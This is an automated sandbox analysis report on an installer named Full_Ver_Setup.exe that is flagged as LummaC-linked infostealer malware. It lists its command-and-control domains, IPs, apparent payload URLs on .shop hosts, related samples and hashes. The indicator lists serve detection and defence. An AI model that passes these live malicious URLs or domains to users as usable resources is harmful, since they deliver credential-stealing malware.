              windows-stand
              SourceDetectionScannerLabelLink
              Full_Ver_Setup.exe13%VirustotalBrowse
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              NameIPActiveMaliciousAntivirus DetectionReputation
              fannleadyn.click
              104.21.63.229
              truetrue
                unknown
                kliptizq.shop
                104.21.84.113
                truefalse
                  high
                  neqi.shop
                  194.58.112.174
                  truefalse
                    unknown
                    NameMaliciousAntivirus DetectionReputation
                    necklacebudi.latfalse
                      high
                      fannleadyn.clicktrue
                        unknown
                        aspecteirs.latfalse
                          high
                          sustainskelet.latfalse
                            high
                            crosshuaht.latfalse
                              high
                              rapeflowwj.latfalse
                                high
                                energyaffai.latfalse
                                  high
                                  https://kliptizq.shop/int_clp_ldr_sha.txtfalse
                                    unknown
                                    grannyejh.latfalse
                                      high
                                      discokeyus.latfalse
                                        high
                                        https://fannleadyn.click/apitrue
                                          unknown
                                          NameSourceMaliciousAntivirus DetectionReputation
                                          https://www.cloudflare.com/learning/access-management/phishing-attack/powershell.exe, 00000004.00000002.2180106835.0000000005735000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://duckduckgo.com/chrome_newtabFull_Ver_Setup.exe, 00000000.00000003.1874405140.0000000003F4A000.00000004.00000800.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1874719963.0000000003F47000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://fannleadyn.click/1XFull_Ver_Setup.exe, 00000000.00000003.1992514646.000000000082A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                unknown
                                                https://duckduckgo.com/ac/?q=Full_Ver_Setup.exe, 00000000.00000003.1874405140.0000000003F4A000.00000004.00000800.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1874719963.0000000003F47000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://kliptizq.shop/Full_Ver_Setup.exe, 00000000.00000002.2174587319.000000000083F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    unknown
                                                    https://fannleadyn.click/apiF9Full_Ver_Setup.exe, 00000000.00000002.2174587319.000000000083F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      unknown
                                                      https://www.cloudflare.com/learning/access-management/phishhZpowershell.exe, 00000004.00000002.2180106835.00000000057D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Full_Ver_Setup.exe, 00000000.00000003.1874405140.0000000003F4A000.00000004.00000800.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1874719963.0000000003F47000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://fannleadyn.click:443/api((Full_Ver_Setup.exe, 00000000.00000003.1900728110.0000000003F0E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            unknown
                                                            https://www.cloudflare.com/5xx-error-landingmancetpowershell.exe, 00000004.00000002.2178588154.0000000003476000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Full_Ver_Setup.exe, 00000000.00000003.1875194044.0000000003FA1000.00000004.00000800.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1875527710.0000000003F55000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://www.cloudflare.com/learning/access-management/phishing-attack/class=cf-btnstyle=background-cpowershell.exe, 00000004.00000002.2178588154.000000000344F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2178588154.00000000034D5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2180079470.00000000050E0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2179797544.0000000003760000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2184472007.0000000007B59000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://fannleadyn.click/YFull_Ver_Setup.exe, 00000000.00000003.1873688893.00000000007DD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    https://fannleadyn.click/apivFull_Ver_Setup.exe, 00000000.00000002.2174587319.000000000083F000.00000004.00000020.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1992272379.0000000000843000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      https://kliptizq.shop/int_clp_ldr_sha.txtf1Full_Ver_Setup.exe, 00000000.00000002.2174587319.000000000083F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        https://neqi.shop/sdgjyut/psh.txtFull_Ver_Setup.exe, 00000000.00000002.2174587319.000000000083F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          https://aka.ms/pscore6lBpowershell.exe, 00000004.00000002.2180106835.0000000005431000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://x1.c.lencr.org/0Full_Ver_Setup.exe, 00000000.00000003.1922564633.000000000400D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://x1.i.lencr.org/0Full_Ver_Setup.exe, 00000000.00000003.1922564633.000000000400D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallFull_Ver_Setup.exe, 00000000.00000003.1875527710.0000000003F32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://www.cloudflare.com/learning/access-management/phishpowershell.exe, 00000004.00000002.2180106835.00000000057D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchFull_Ver_Setup.exe, 00000000.00000003.1874405140.0000000003F4A000.00000004.00000800.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1874719963.0000000003F47000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://www.cloudflare.com/5xx-error-landinghZpowershell.exe, 00000004.00000002.2180106835.00000000057D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://fannleadyn.click/xFull_Ver_Setup.exe, 00000000.00000003.1873688893.00000000007DD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          unknown
                                                                                          https://support.mozilla.org/products/firefoxgro.allFull_Ver_Setup.exe, 00000000.00000003.1923524083.000000000422A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.2180106835.0000000005431000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://fannleadyn.click/rFull_Ver_Setup.exe, 00000000.00000003.1946447013.000000000082A000.00000004.00000020.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1971013794.0000000000824000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                unknown
                                                                                                https://fannleadyn.click/sFull_Ver_Setup.exe, 00000000.00000003.1971013794.0000000000832000.00000004.00000020.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1922392393.0000000000832000.00000004.00000020.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.2012249509.0000000000832000.00000004.00000020.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1946447013.0000000000834000.00000004.00000020.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1992514646.0000000000832000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  unknown
                                                                                                  http://www.innosetup.com/Full_Ver_Setup.exefalse
                                                                                                    high
                                                                                                    https://www.google.com/images/branding/product/ico/googleg_lodp.icoFull_Ver_Setup.exe, 00000000.00000003.1874405140.0000000003F4A000.00000004.00000800.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1874719963.0000000003F47000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://www.cloudflare.com/learning/access-management/phishing-atX)powershell.exe, 00000004.00000002.2180106835.00000000057D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://neqi.shop/sdgjyut/psh.txtY)Full_Ver_Setup.exe, 00000000.00000002.2174587319.000000000085E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          unknown
                                                                                                          https://neqi.shop/Full_Ver_Setup.exe, 00000000.00000002.2174587319.000000000083F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            unknown
                                                                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Full_Ver_Setup.exe, 00000000.00000003.1874405140.0000000003F4A000.00000004.00000800.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1874719963.0000000003F47000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://crl.rootca1.amazontrust.com/rootca1.crl0Full_Ver_Setup.exe, 00000000.00000003.1922564633.000000000400D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://fannleadyn.click:443/apiellFull_Ver_Setup.exe, 00000000.00000002.2173229221.0000000000832000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  unknown
                                                                                                                  http://ocsp.rootca1.amazontrust.com0:Full_Ver_Setup.exe, 00000000.00000003.1922564633.000000000400D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Full_Ver_Setup.exe, 00000000.00000003.1875194044.0000000003FA1000.00000004.00000800.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1875527710.0000000003F55000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://www.ecosia.org/newtab/Full_Ver_Setup.exe, 00000000.00000003.1874405140.0000000003F4A000.00000004.00000800.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1874719963.0000000003F47000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://fannleadyn.click:443/api_PROFILE_STRING=InternetFull_Ver_Setup.exe, 00000000.00000002.2173229221.0000000000832000.00000004.00000020.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.2012249509.0000000000832000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          unknown
                                                                                                                          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brFull_Ver_Setup.exe, 00000000.00000003.1923524083.000000000422A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://www.cloudflare.com/5xx-error-landingpowershell.exe, 00000004.00000002.2180106835.0000000005735000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://kliptizq.shop:443/int_clp_ldr_sha.txtnFull_Ver_Setup.exe, 00000000.00000002.2173229221.0000000000832000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                unknown
                                                                                                                                https://www.cloudflare.com/5xx-error-landingid=brand_linktarget=_blankpowershell.exe, 00000004.00000002.2178588154.000000000344F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2178588154.00000000034D5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2180079470.00000000050E0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2179797544.0000000003760000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2184472007.0000000007B59000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://ac.ecosia.org/autocomplete?q=Full_Ver_Setup.exe, 00000000.00000003.1874405140.0000000003F4A000.00000004.00000800.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1874719963.0000000003F47000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://neqi.shop/YFull_Ver_Setup.exe, 00000000.00000002.2174587319.000000000083F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      unknown
                                                                                                                                      https://fannleadyn.click/api2Full_Ver_Setup.exe, 00000000.00000003.1873688893.00000000007DD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        unknown
                                                                                                                                        https://neqi.shop:443/sdgjyut/psh.txtFull_Ver_Setup.exe, 00000000.00000002.2173229221.0000000000832000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          unknown
                                                                                                                                          https://neqi.shop/sdgjyut/psh.txtcFull_Ver_Setup.exe, 00000000.00000002.2174587319.000000000083F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            unknown
                                                                                                                                            https://fannleadyn.click/apiDZFull_Ver_Setup.exe, 00000000.00000003.2012801885.0000000000862000.00000004.00000020.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.2012326508.0000000000861000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              unknown
                                                                                                                                              https://support.microsofFull_Ver_Setup.exe, 00000000.00000003.1875194044.0000000003FA3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://crt.rootca1.amazontrust.com/rootca1.cer0?Full_Ver_Setup.exe, 00000000.00000003.1922564633.000000000400D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://fannleadyn.click/Full_Ver_Setup.exe, 00000000.00000003.1971013794.0000000000824000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    unknown
                                                                                                                                                    http://www.remobjects.com/psFull_Ver_Setup.exefalse
                                                                                                                                                      high
                                                                                                                                                      https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesFull_Ver_Setup.exe, 00000000.00000003.1875527710.0000000003F32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Full_Ver_Setup.exe, 00000000.00000003.1874405140.0000000003F4A000.00000004.00000800.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1874719963.0000000003F47000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                          • 75% < No. of IPs
                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                          104.21.84.113
                                                                                                                                                          kliptizq.shopUnited States
                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                          104.21.63.229
                                                                                                                                                          fannleadyn.clickUnited States
                                                                                                                                                          13335CLOUDFLARENETUStrue
                                                                                                                                                          194.58.112.174
                                                                                                                                                          neqi.shopRussian Federation
                                                                                                                                                          197695AS-REGRUfalse
                                                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                          Analysis ID:1579540
                                                                                                                                                          Start date and time:2024-12-22 23:29:10 +01:00
                                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                                          Overall analysis duration:0h 4m 56s
                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                          Report type:full
                                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                          Number of analysed new started processes analysed:6
                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                                          Technologies:
                                                                                                                                                          • HCA enabled
                                                                                                                                                          • EGA enabled
                                                                                                                                                          • AMSI enabled
                                                                                                                                                          Analysis Mode:default
                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                          Sample name:Full_Ver_Setup.exe
                                                                                                                                                          Detection:MAL
                                                                                                                                                          Classification:mal100.troj.spyw.evad.winEXE@4/3@3/3
                                                                                                                                                          EGA Information:
                                                                                                                                                          • Successful, ratio: 50%
                                                                                                                                                          HCA Information:
                                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                                          • Number of executed functions: 15
                                                                                                                                                          • Number of non-executed functions: 109
                                                                                                                                                          Cookbook Comments:
                                                                                                                                                          • Found application associated with file extension: .exe
                                                                                                                                                          • Stop behavior analysis, all processes terminated
                                                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.63
                                                                                                                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                          • Execution Graph export aborted for target powershell.exe, PID 3064 because it is empty
                                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                          TimeTypeDescription
                                                                                                                                                          17:30:19API Interceptor11x Sleep call for process: Full_Ver_Setup.exe modified
                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                          104.21.84.113TT4ybwWc1T.exeGet hashmaliciousLummaC Stealer, zgRATBrowse
                                                                                                                                                          • voloknus.pw/api
                                                                                                                                                          104.21.63.229file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                            'Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                              http://cabonusoffer.com/track/Get hashmaliciousUnknownBrowse
                                                                                                                                                                194.58.112.174SWIFT COPY.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                • www.elinor.club/1ne4/
                                                                                                                                                                Nieuwebestellingen10122024.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                • www.synd.fun/6sgf/
                                                                                                                                                                SRT68.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                • www.fantastica.digital/5srj/
                                                                                                                                                                72STaC6BmljfbIQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                • www.elinor.club/1ne4/
                                                                                                                                                                specification and drawing.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                • www.synd.fun/6sgf/
                                                                                                                                                                Pre Alert PO TVKJEANSA00967.bat.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                • www.elinor.club/7plr/
                                                                                                                                                                CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                • www.sklad-iq.online/gdvz/
                                                                                                                                                                CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                • www.sklad-iq.online/gdvz/
                                                                                                                                                                Item-RQF-9456786.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                • www.sklad-iq.online/j4lg/
                                                                                                                                                                PO AT-5228.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                • www.marketplacer.top/xprp/
                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                kliptizq.shopsetup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                • 104.21.84.113
                                                                                                                                                                Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                • 104.21.84.113
                                                                                                                                                                setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                • 172.67.191.144
                                                                                                                                                                Set-up.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                • 104.21.84.113
                                                                                                                                                                'Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                • 172.67.191.144
                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                CLOUDFLARENETUSloligang.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                • 162.158.254.178
                                                                                                                                                                winwidgetshp.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                                                                                • 104.21.18.182
                                                                                                                                                                https://cpanel05wh.bkk1.cloud.z.com/~cp197720/open/DD/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                • 104.21.234.144
                                                                                                                                                                nshkppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                • 104.24.135.181
                                                                                                                                                                swift-bootstrapper.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                • 104.18.38.10
                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                • 104.21.67.146
                                                                                                                                                                7394231845.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                • 104.17.25.14
                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                • 104.21.67.146
                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                • 104.21.63.229
                                                                                                                                                                CLOUDFLARENETUSloligang.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                • 162.158.254.178
                                                                                                                                                                winwidgetshp.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                                                                                • 104.21.18.182
                                                                                                                                                                https://cpanel05wh.bkk1.cloud.z.com/~cp197720/open/DD/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                • 104.21.234.144
                                                                                                                                                                nshkppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                • 104.24.135.181
                                                                                                                                                                swift-bootstrapper.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                • 104.18.38.10
                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                • 104.21.67.146
                                                                                                                                                                7394231845.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                • 104.17.25.14
                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                • 104.21.67.146
                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                • 104.21.63.229
                                                                                                                                                                AS-REGRUSWIFT COPY.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                • 194.58.112.174
                                                                                                                                                                arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                • 194.58.59.91
                                                                                                                                                                Nieuwebestellingen10122024.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                • 194.58.112.174
                                                                                                                                                                hax.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                • 194.58.94.235
                                                                                                                                                                Outstanding Invoices Spreadsheet Scan 00495_PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                • 31.31.198.145
                                                                                                                                                                Revo.Uninstaller.Pro.v5.3.4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                • 194.87.189.43
                                                                                                                                                                Revo.Uninstaller.Pro.v5.3.4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                • 194.87.189.43
                                                                                                                                                                cXjy5Y6dXX.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                • 193.124.205.63
                                                                                                                                                                SRT68.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                • 194.58.112.174
                                                                                                                                                                New Order.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                • 31.31.196.17
                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                a0e9f5d64349fb13191bc781f81f42e1winwidgetshp.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                                                                                • 104.21.84.113
                                                                                                                                                                • 104.21.63.229
                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                • 104.21.84.113
                                                                                                                                                                • 104.21.63.229
                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                • 104.21.84.113
                                                                                                                                                                • 104.21.63.229
                                                                                                                                                                Solara-3.0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                • 104.21.84.113
                                                                                                                                                                • 104.21.63.229
                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                                                                                                • 104.21.84.113
                                                                                                                                                                • 104.21.63.229
                                                                                                                                                                Rechnung736258.pdf.lnkGet hashmaliciousLummaCBrowse
                                                                                                                                                                • 104.21.84.113
                                                                                                                                                                • 104.21.63.229
                                                                                                                                                                Navan - Itinerary.pdf.scr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                • 104.21.84.113
                                                                                                                                                                • 104.21.63.229
                                                                                                                                                                No context
                                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):64
                                                                                                                                                                Entropy (8bit):0.6599547231656377
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Nllluly/:NllU
                                                                                                                                                                MD5:CD58C7193AF7B74B8F5AB012CEAA83D1
                                                                                                                                                                SHA1:48F5F741531E2611CC155853BB9BFCF470AD2262
                                                                                                                                                                SHA-256:AA0870FDCF90E60FC4555437FED5E92D49DE3A7C81E2E66D5763B25CF58EE4D7
                                                                                                                                                                SHA-512:B2F920ED07178691B4568D9459954BE281284DBA8E5DAC76147764180AE78306E32630098A1EA2F8D5721E56B87EE80E6C96BF73E96F44D3A19F15759613F3CF
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                                                Preview:@...e...........................................................
                                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60
                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:high, very likely benign file
                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60
                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                Entropy (8bit):0.4156493702622237
                                                                                                                                                                TrID:
                                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 97.75%
                                                                                                                                                                • Windows ActiveX control (116523/4) 1.14%
                                                                                                                                                                • Inno Setup installer (109748/4) 1.07%
                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                File name:Full_Ver_Setup.exe
                                                                                                                                                                File size:74'953'137 bytes
                                                                                                                                                                MD5:5258ca149eea36d761a7e5649cb93855
                                                                                                                                                                SHA1:6b6c7a347389758d8edfb8582a730871c6786c06
                                                                                                                                                                SHA256:d92ea1ef0c0f2c1b6fe016fc25473bb6ce625d9a2c5134c62806aeb07c5033af
                                                                                                                                                                SHA512:2b8f9f29476c7f7020a5d0fcb61bf2f58e65bf35e4b2feb904c2b93cf935a8c4a1909c42a16ef2b70f5338996513c9349e816141de96051675527d415ffe7cf8
